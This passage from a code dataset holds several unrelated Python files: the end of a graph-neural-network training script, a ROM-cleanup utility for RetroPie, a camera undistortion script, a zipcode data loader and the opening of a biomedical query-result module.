layer\n self.lstm_text = eval('nn.' + rnn_type)(self.ini_hidden_dim[0], self.hidden_dim, self.num_layers, batch_first=True,\n bidirectional=True)\n self.lstm_image = eval('nn.' + rnn_type)(self.ini_hidden_dim[1], self.hidden_dim, self.num_layers, batch_first=True,\n bidirectional=True)\n self.lstm_other = eval('nn.' + rnn_type)(self.ini_hidden_dim[2], self.hidden_dim, self.num_layers, batch_first=True,\n bidirectional=True)\n # Define same_type_agg\n self.u_init_linear = nn.Linear(self.u_input_dim, self.u_ini_hidden_dim)\n self.u_lstm = eval('nn.' 
+ self.u_rnn_type)(self.u_ini_hidden_dim, self.u_hidden_dim, self.u_num_layers,\n batch_first=True, bidirectional=True)\n self.u_linear = nn.Linear(self.u_hidden_dim * 2, self.u_output_dim)\n self.u_dropout = nn.Dropout(p=0.5)\n self.p_init_linear = nn.Linear(self.p_input_dim, self.p_ini_hidden_dim)\n self.p_lstm = eval('nn.' + self.p_rnn_type)(self.p_ini_hidden_dim, self.p_hidden_dim, self.p_num_layers,\n batch_first=True, bidirectional=True)\n self.p_linear = nn.Linear(self.p_hidden_dim * 2, self.p_output_dim)\n self.p_dropout = nn.Dropout(p=0.5)\n self.act = nn.LeakyReLU()\n self.softmax = nn.Softmax(dim=1)\n self.out_linear = nn.Linear(self.out_embed_d, self.outemb_d)\n self.output_act = nn.Sigmoid()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear) or isinstance(m, nn.Parameter):\n nn.init.xavier_normal_(m.weight.data)\n m.bias.data.fill_(0.1)\n\n def Bi_RNN(self, neighbor_id, node_type, post_emb_dict, user_emb_dict):\n # Forward pass through initial hidden layer\n input_a = []\n input_b = []\n new_id = []\n if node_type == \"post\":\n for i in neighbor_id:\n if (\"post\", i) not in self.content_dict:\n input_a.append(post_emb_dict[i][0])\n input_b.append(post_emb_dict[i][1])\n new_id.append(i)\n input_a = torch.Tensor(input_a)\n input_b = torch.Tensor(input_b)\n linear_input_text = self.init_linear_text(input_a)\n linear_input_image = self.init_linear_image(input_b)\n linear_input_text = linear_input_text.view(linear_input_text.shape[0],1,linear_input_text.shape[1])\n linear_input_image = linear_input_image.view(linear_input_image.shape[0],1,linear_input_image.shape[1])\n lstm_out_text, self.hidden_text = self.lstm_text(linear_input_text)\n lstm_out_image, self.hidden_image = self.lstm_image(linear_input_image)\n concate = torch.cat((lstm_out_text, lstm_out_image), 1)\n if node_type == \"user\":\n for i in neighbor_id:\n if (\"user\", i) not in self.content_dict:\n input_a.append(user_emb_dict[i][0])\n input_b.append(user_emb_dict[i][1])\n new_id.append(i)\n input_a = torch.Tensor(input_a)\n input_b = torch.Tensor(input_b)\n linear_input_text = self.init_linear_text(input_b)\n linear_input_other = self.init_linear_other(input_a)\n linear_input_text = linear_input_text.view(linear_input_text.shape[0], 1, linear_input_text.shape[1])\n linear_input_other = linear_input_other.view(linear_input_other.shape[0], 1, linear_input_other.shape[1])\n lstm_out_text, self.hidden_text = self.lstm_text(linear_input_text)\n lstm_out_other, self.hidden_other = self.lstm_other(linear_input_other)\n concate = torch.cat((lstm_out_text, lstm_out_other), 1)\n\n # mean pooling all the states\n mean_pooling = torch.mean(concate, 1)\n\n for i in neighbor_id:\n if (node_type, i) in self.content_dict:\n # torch.cat takes a tuple of tensors; cached rows are 1-D, so re-expand them to 2-D before concatenating\n mean_pooling = torch.cat((mean_pooling, self.content_dict[(node_type, i)].unsqueeze(0)), dim=0)\n for i in range(len(new_id)):\n # cache under the same (node_type, id) keys that the lookups above use\n self.content_dict[(node_type, new_id[i])] = mean_pooling[i]\n return mean_pooling\n\n #features: list of [(id)]\n def SameType_Agg_Bi_RNN(self, neighbor_id, node_type):\n content_embeddings = self.Bi_RNN(neighbor_id, node_type, post_emb_dict, user_emb_dict)\n if node_type == 'post':\n linear_input = self.p_init_linear(content_embeddings)\n linear_input = linear_input.view(linear_input.shape[0],1,linear_input.shape[1])\n lstm_out, hidden = self.p_lstm(linear_input)\n last_state = self.p_linear(lstm_out)\n last_state = self.p_dropout(last_state)\n mean_pooling = torch.mean(last_state, 0)\n return mean_pooling\n else:\n linear_input = self.u_init_linear(content_embeddings)\n linear_input = 
linear_input.view(linear_input.shape[0], 1, linear_input.shape[1])\n lstm_out, hidden = self.u_lstm(linear_input)\n last_state = self.u_linear(lstm_out)\n last_state = self.u_dropout(last_state)\n mean_pooling = torch.mean(last_state, 0)\n return mean_pooling\n\n def node_het_agg(self, het_node): #heterogeneous neighbor aggregation\n\n #attention module\n c_agg_batch = self.Bi_RNN([het_node.node_id], het_node.node_type, post_emb_dict, user_emb_dict)\n u_agg_batch = self.SameType_Agg_Bi_RNN(het_node.neighbors_user, \"user\")\n p_agg_batch = self.SameType_Agg_Bi_RNN(het_node.neighbors_post, \"post\")\n\n c_agg_batch_2 = torch.cat((c_agg_batch, c_agg_batch), 1).view(len(c_agg_batch), self.embed_d * 2)\n u_agg_batch_2 = torch.cat((c_agg_batch, u_agg_batch), 1).view(len(c_agg_batch), self.embed_d * 2)\n p_agg_batch_2 = torch.cat((c_agg_batch, p_agg_batch), 1).view(len(c_agg_batch), self.embed_d * 2)\n\n #compute weights\n concate_embed = torch.cat((c_agg_batch_2, u_agg_batch_2, p_agg_batch_2), 1).view(len(c_agg_batch), 3, self.embed_d * 2)\n if het_node.node_type == \"user\":\n atten_w = self.act(torch.bmm(concate_embed, self.u_neigh_att.unsqueeze(0).expand(len(c_agg_batch),*self.u_neigh_att.size())))\n else:\n atten_w = self.act(torch.bmm(concate_embed, self.p_neigh_att.unsqueeze(0).expand(len(c_agg_batch),*self.p_neigh_att.size())))\n atten_w = self.softmax(atten_w).view(len(c_agg_batch), 1, 3)\n\n #weighted combination\n concate_embed = torch.cat((c_agg_batch, u_agg_batch, p_agg_batch), 1).view(len(c_agg_batch), 3, self.embed_d)\n weight_agg_batch = torch.bmm(atten_w, concate_embed).view(len(c_agg_batch), self.embed_d)\n\n return weight_agg_batch\n \n def output(self, c_embed_batch):\n\n batch_size = 1\n # make c_embed 3D tensor. Batch_size * 1 * embed_d\n c_embed = c_embed_batch.view(batch_size, 1, self.out_embed_d)\n c_embed_out = self.out_linear(c_embed)\n predictions = self.output_act(c_embed_out) #sigmoid = 1/(1+exp(-x))\n return predictions\n\n def forward(self, x):\n x = self.node_het_agg(het_node = x)\n x = self.output(c_embed_batch=x)\n return x\n\n\ndef BCELoss(predictions, true_label):\n loss = nn.BCELoss()\n predictions = predictions.view(1)\n tensor_label = torch.FloatTensor(np.array([true_label]))\n loss_sum = loss(predictions, tensor_label)\n return loss_sum\n\n\nnet = Het_GNN(input_dim = [300, 512, 12], ini_hidden_dim = [500, 500, 500], hidden_dim=100, batch_size=1, u_input_dim=200, u_hidden_dim=500, u_ini_hidden_dim=500,\n u_batch_size=1, u_output_dim=200, u_num_layers=1, u_rnn_type='LSTM', p_input_dim=200,\n p_hidden_dim=500, p_ini_hidden_dim=500, p_batch_size=1, p_output_dim=200, p_num_layers=1,\n p_rnn_type='LSTM',out_embed_d=200, outemb_d=1)\nnet.init_weights()\nprint(net)\noptimizer = optim.SGD(net.parameters(), lr=0.05)\nrunning_loss = 0.0\nval_loss = 0.0\ntest_loss = 0.0\nnum_epoch = 5\nprint('Start training')\n\n# Shuffle the order in post nodes\nnp.random.shuffle(post_nodes)\n\n# K-fold validation index; keyword arguments required on current scikit-learn\nkfold = KFold(n_splits=10, shuffle=True, random_state=1)\ntrain_index = []\nval_index = []\nfor train, val in kfold.split(post_nodes[:4300]):\n train_index.append(train)\n val_index.append(val)\n\n# split test set first\ntest_set = post_nodes[4300:]\n\nfor epoch in range(num_epoch):\n print('Epoch:', epoch+1)\n c = 0.0\n running_loss = 0.0\n v = 0.0\n\n # generate train and validation set for current epoch\n train_set = []\n val_set = []\n for t_index in train_index[epoch]:\n train_set.append(post_nodes[t_index])\n for v_index in val_index[epoch]:\n 
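# Editor's note (added comment, not part of the original source): num_epoch is 5 while KFold yields 10 splits,\n # so only folds 0-4 are consumed; each epoch therefore trains on a different train/validation split.\n 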
val_set.append(post_nodes[v_index])\n for i in range(len(train_set)):\n optimizer.zero_grad()\n output = net(train_set[i])\n if (output.item() >= 0.5 and train_set[i].label == 1) or (output.item() < 0.5 and train_set[i].label == 0):\n c += 1\n loss = BCELoss(predictions=output, true_label=train_set[i].label)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n if i % 100 == 99: # print every 100 mini-batches\n print('Epoch: %d, step: %5d, loss: %.4f, acc: %.4f'%\n (epoch + 1, i + 1, running_loss / 100, c/100))\n running_loss = 0.0\n c = 0.0\n for j in range(len(val_set)):\n output = net(val_set[j])\n if (output.item() >= 0.5 and val_set[j].label == 1) or (output.item() < 0.5 and val_set[j].label == 0):\n v += 1\n vloss = BCELoss(predictions=output, true_label=val_set[j].label)\n val_loss += vloss.item()\n print('Validation loss: %.4f, Validation accuracy: %.4f'% (val_loss/len(val_set), v/len(val_set)))\n v = 0.0\n val_loss = 0.0\nprint('Finish training')\n\nprint('==============================================================')\n\nprint('Start testing')\nt = 0.0\nfor k in range(len(test_set)):\n output = net(test_set[k])\n if (output.item() >= 0.5 and test_set[k].label == 1) or (output.item() < 0.5 and test_set[k].label == 0):\n t += 1\n tloss = BCELoss(predictions=output, true_label=test_set[k].label)\n test_loss += tloss.item()\n\nprint('Test loss: %.4f, Test accuracy: %.4f'% (test_loss/len(test_set), t/len(test_set)))\nprint('Finish testing')\n\n", "sub_path": "het_agg_modi.py", "file_name": "het_agg_modi.py", "file_ext": "py", "file_size_in_byte": 15721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.cuda.is_available", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.Linear", 
"line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 142, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 272, "usage_type": "name"}, {"api_name": "numpy.random.shuffle", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 285, "usage_type": "call"}]} +{"seq_id": "164672651", "text": "#!/usr/bin/env python3\nfrom os import path, listdir, makedirs\nfrom locale import setlocale, LC_ALL\nfrom dialog import Dialog as dialog\nfrom sys import exit\nfrom xml.etree import ElementTree as xml\nfrom pathlib import Path\nfrom shutil import move\n\n#####\n\nROM_PATH = 
\"Downloads/Roms/roms\" # RetroPie/roms\nUNSCRAPED_PATH = \"Downloads/Roms/roms/unscraped\"\n\n#####\n\nhome = str(Path.home())\nrompath = path.join(home, ROM_PATH)\nunscrapedpath = path.join(home, UNSCRAPED_PATH)\n\nsetlocale(LC_ALL, '')\n\n# Set up 'dialog'\nd = dialog(autowidgetsize=True)\nd.set_background_title(\"Remove Unscraped Roms\")\n\n# Make sure the rompath exists\nif not path.isdir(rompath):\n d.msgbox(\"Could not find rom path %s!\" % rompath)\n exit(1)\n\n# Show an infobox\nd.infobox(\"Searching for unscraped roms in %s...\\n\" % rompath)\n\n# List of systems to clean up\nsystems = []\n\n# Loop over all files in the rompath\nfor system in listdir(rompath):\n \n # Make sure it's a directory\n if path.isdir(path.join(rompath, system)) and path.join(rompath, system) != unscrapedpath:\n \n # Make sure there is a 'gamelist.xml' file inside\n gamelist = path.join(rompath, system, 'gamelist.xml')\n if path.exists(gamelist):\n \n # Append the system\n systems.append( (system, \"\", 1 ) )\n\n# Create checklist of all found systems\ncode, systems = d.checklist(\"Which folders should be cleaned of unscraped roms?\", choices=systems)\n\n# If cancel was pressed, quit the program\nif code == d.CANCEL:\n print(\"\\033[H\\033[J\")\n d.clear()\n exit(1)\n\n# Create a list of roms to move and a text placeholder\nmove_roms = []\nmove_text = \"\"\n\n# Show an infobox while searching\nd.infobox(\"Searching for unscraped roms of selected systems...\")\n\n# Loop over all selected systems\nfor system in systems:\n \n # Create a subfolder in the move path, if it doesn't exist\n unscraped_system_path = path.join(unscrapedpath, system)\n if not path.exists(unscraped_system_path):\n makedirs(unscraped_system_path)\n \n # Count total games (only files, subtract one for gamelist.xml which we know exists)\n total_games = len([rom for rom in listdir(path.join(rompath, system)) if path.isfile(path.join(rompath, system, rom))]) - 1\n scraped_games = []\n \n # Get paths of scraped roms from the systems 'gamelist.xml'\n for game in xml.parse(path.join(rompath, system, 'gamelist.xml')).getroot():\n scraped_games.append(game.find('path').text)\n \n # Append to the list text\n move_text += \"Games in '%s' folder: %d total, %d scraped\\n===================================================\\n\\n\" % (system, total_games, len(scraped_games))\n \n # Loop over all roms in the system path\n for rom in listdir(path.join(rompath, system)):\n \n # Build full rompath\n romfile = path.join(rompath, system, rom)\n \n # Check if the rom is a file, not in scraped games and is not the 'gamelist.xml'\n if path.isfile(romfile) and romfile not in scraped_games and rom != 'gamelist.xml':\n \n # Excception for cue/bin pairs\n if romfile.endswith('.bin') and (romfile[:-4] + \".cue\") in scraped_games :\n break\n \n # Append the rom and text\n move_text += \" - %s\\n\" % rom\n move_roms.append( ( path.join(rompath, system, rom), path.join(unscrapedpath, system, rom) ) )\n\n # Add some linebreaks\n move_text += \"\\n\\n\"\n\n# If there are no unscraped roms, we're done\nif len(move_roms) == 0 :\n d.msgbox(\"Did not find any unscraped roms across %d systems in %s!\" % (len(systems), rompath), width=60, height=6)\n print(\"\\033[H\\033[J\")\n d.clear()\n exit(0)\n \n# Ask if the roms should be moved\nif d.scrollbox(move_text, extra_button=True, ok_label=\"Move roms\", extra_label=\"Exit\") == d.OK :\n \n # Show an infobox while moving\n d.infobox(\"Moving unscraped roms...\")\n \n # Move roms to unscrapedpath\n for source, destination in 
move_roms:\n move(source, destination)\n \n # Done with this system\n d.msgbox(\"Moved %d unscraped roms to %s!\\n\" % (len(move_roms), unscrapedpath), width=60, height=6)\n\n# Done \nprint(\"\\033[H\\033[J\")\nd.clear()\nexit(0)", "sub_path": "delete-unscraped-roms/delete-unscraped-roms.py", "file_name": "delete-unscraped-roms.py", "file_ext": "py", "file_size_in_byte": 4050, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pathlib.Path.home", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "name"}, {"api_name": "locale.setlocale", "line_number": 21, "usage_type": "call"}, {"api_name": "locale.LC_ALL", "line_number": 21, "usage_type": "argument"}, {"api_name": "dialog.Dialog", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 73, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 76, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 80, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 80, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 111, 
"usage_type": "call"}, {"api_name": "shutil.move", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "303005770", "text": "\nimport numpy as np\n\nimport scipy.ndimage\nimage = scipy.ndimage.imread(\"data/task34/CalibIm1.gif\")\n\nimport numpy as np\ncx,cy = np.meshgrid(np.arange(image.shape[0]), np.arange(image.shape[1]))\n\nr = np.stack((cx,cy), axis=2).reshape((-1,2), order='F')\n\nfrom scipy import ndimage\n# ndimage.map_coordinates(a, [[0.5, 2, 3], [0.5, 1, 2]], order=1)\n\nimager = image[:,:,0]\nimageg = image[:,:,1]\nimageb = image[:,:,2]\n\nfrom task3 import *\ndistortion, intrinsicMtx, mtxs = loadCalibData(\"data/task34/Calib.txt\")\nextrinsicMatrix = mtxs[0]\n\nendhomor = np.array([ (p[0], p[1], 1.0) for p in r ])\nintrInv = np.linalg.inv(intrinsicMtx)\nnormalizedHomopoints = intrInv.dot(endhomor.transpose())\nprojectedPoints = np.array([ (hp[0] / hp[2], hp[1] / hp[2]) for hp in normalizedHomopoints.transpose() ])\ncorrectedPoints = np.array([ correctedPoint(p, distortion) for p in projectedPoints ])\nhomopoints2 = np.array([ (p[0], p[1], 1.0) for p in correctedPoints ])\npoints3 = np.array([ intrinsicMtx.dot(p) for p in homopoints2 ])\npoints4 = np.array([ (hp[0] / hp[2], hp[1] / hp[2]) for hp in points3 ])\nmappedPointsR = ndimage.map_coordinates(imager, points4.transpose(), order=3).reshape(480, 640)\nmappedPointsG = ndimage.map_coordinates(imageg, points4.transpose(), order=3).reshape(480, 640)\nmappedPointsB = ndimage.map_coordinates(imageb, points4.transpose(), order=3).reshape(480, 640)\nnewimage = np.stack((mappedPointsR, mappedPointsG, mappedPointsB), axis=-1)\nscipy.misc.imsave(\"data/task34/bar.gif\", newimage)\n\ndistortion, intrinsicMtx, mtxs = loadCalibData(\"data/task34/Calib.txt\")\npoints = loadModelPoints(\"data/task34/Model.txt\")\nhomopoints = [ (p[0], p[1], 0.0, 1.0) for p in points ]\n\n# Undistorted pictures\nsavePictureWithPoints(\"data/task34/bar.gif\", intrinsicMtx, mtxs[0], homopoints)\n", "sub_path": "lab1/tmptask3.py", "file_name": "tmptask3.py", "file_ext": "py", "file_size_in_byte": 1780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.ndimage.ndimage.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "scipy.ndimage.ndimage", "line_number": 5, "usage_type": "attribute"}, {"api_name": "scipy.ndimage", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.ndimage.map_coordinates", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 31, "usage_type": "name"}, {"api_name": "scipy.ndimage.map_coordinates", "line_number": 32, "usage_type": "call"}, {"api_name": "scipy.ndimage", 
"line_number": 32, "usage_type": "name"}, {"api_name": "scipy.ndimage.map_coordinates", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.stack", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.ndimage.misc.imsave", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.ndimage.misc", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.ndimage", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "416177257", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom datetime import *\nfrom models import *\nimport db_api\nimport csv\n#######################################################################\n# Add zipcode information from CSV to DB\nNO_ETO = -1\ndef add_zipcode_infos(infile):\n ifile = open(infile,'rb') \n reader = csv.reader(ifile, delimiter=',') \n for row in reader: \n cols = row\n zipcode = cols[0] \n city = cols[1] \n state = cols[2] \n lat = float(cols[3])\n lng = float(cols[4])\n ele = float(cols[5])\n timezone = int(cols[6])\n dst = int(cols[7])\n\n m1 = float(cols[8])\n m2 = float(cols[9])\n m3 = float(cols[10])\n m4 = float(cols[11])\n m5 = float(cols[12])\n m6 = float(cols[13])\n m7 = float(cols[14])\n m8 = float(cols[15])\n m9 = float(cols[16])\n m10 = float(cols[17])\n m11 = float(cols[18])\n m12 = float(cols[19])\n\n now = datetime.now()\n z = ZipcodeInfo(zipcode=zipcode, city=city,latitude=lat, longitude=lng,elevation=ele, time_zone=timezone,dst=dst,created_at=now,updated_at=now)\n if (float(m1)!=NO_ETO):\n now = datetime.now()\n Eto(zipcode=zipcode, created_at=now, updated_at=now,\n m1=m1, m2=m2, m3=m3, m4=m4, m5=m5, m6=m6, m7=m7, m8=m8, m9=m9, m10=m10, m11=m11, m12=m12)\n\ndef add_data():\n add_zipcode_infos('data/zipcode_infos.csv')\n\ndb_api.open()\nadd_data()\ndb_api.close()\n", "sub_path": "add_data.py", "file_name": "add_data.py", "file_ext": "py", "file_size_in_byte": 1363, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "csv.reader", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "db_api.open", "line_number": 48, "usage_type": "call"}, {"api_name": "db_api.close", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "582609004", "text": "#!/usr/bin/env python3\n'''This module defines the `ARAXResultify` class whose `_resultify` method\nenumerates subgraphs of a knowledge graph (KG) that match a pattern set by a\nquery graph (QG) and sets the `results` data attribute of the `message` object\nto be a list of `Result` objects, each corresponding to one of the enumerated\nsubgraphs. The matching between the KG subgraphs and the QG can be forced to be\nsensitive to edge direction by setting `ignore_edge_direction=false` (the\ndefault is to ignore edge direction).\n\n Usage: python3 -u ARAX_resultify.py\n\n will run the built-in tests for ARAX_resultify.py. 
When testing, also be sure\n to run the `document_dsl_commands.py` script in the `code/ARAX/Documentation`\n directory since that script uses the `describe_me` method of this module.\n\n'''\n\nimport collections\nimport math\nimport os\nimport sys\nfrom typing import List, Dict, Set, Union, Iterable, cast, Optional\nfrom response import Response\n\n__author__ = 'Stephen Ramsey and Amy Glen'\n__copyright__ = 'Oregon State University'\n__credits__ = ['Stephen Ramsey', 'Amy Glen', 'David Koslicki', 'Eric Deutsch']\n__license__ = 'MIT'\n__version__ = '0.1.0'\n__maintainer__ = 'Amy Glen'\n__email__ = ''\n__status__ = 'Prototype'\n\n\n# is there a better way to import swagger_server? Following SO posting 16981921\nPACKAGE_PARENT = '../../UI/OpenAPI/python-flask-server'\nsys.path.append(os.path.normpath(os.path.join(os.getcwd(), PACKAGE_PARENT)))\nfrom swagger_server.models.edge import Edge\nfrom swagger_server.models.node import Node\nfrom swagger_server.models.q_edge import QEdge\nfrom swagger_server.models.q_node import QNode\nfrom swagger_server.models.query_graph import QueryGraph\nfrom swagger_server.models.knowledge_graph import KnowledgeGraph\nfrom swagger_server.models.node_binding import NodeBinding\nfrom swagger_server.models.edge_binding import EdgeBinding\nfrom swagger_server.models.biolink_entity import BiolinkEntity\nfrom swagger_server.models.result import Result\nfrom swagger_server.models.message import Message\n\n\n# define a string-parameterized BiolinkEntity class\nclass BiolinkEntityStr(BiolinkEntity):\n def __init__(self, category_label: str):\n super().__init__()\n self.category_label = category_label\n\n def __str__(self):\n return super().__str__() + \":\" + self.category_label\n\n\n# define a map between category_label and BiolinkEntity object\nBIOLINK_CATEGORY_LABELS = {'protein', 'disease', 'phenotypic_feature', 'gene', 'chemical_substance'}\nBIOLINK_ENTITY_TYPE_OBJECTS = {category_label: BiolinkEntityStr(category_label) for\n category_label in BIOLINK_CATEGORY_LABELS}\n\n\nclass ARAXResultify:\n ALLOWED_PARAMETERS = {'debug', 'ignore_edge_direction'}\n\n def 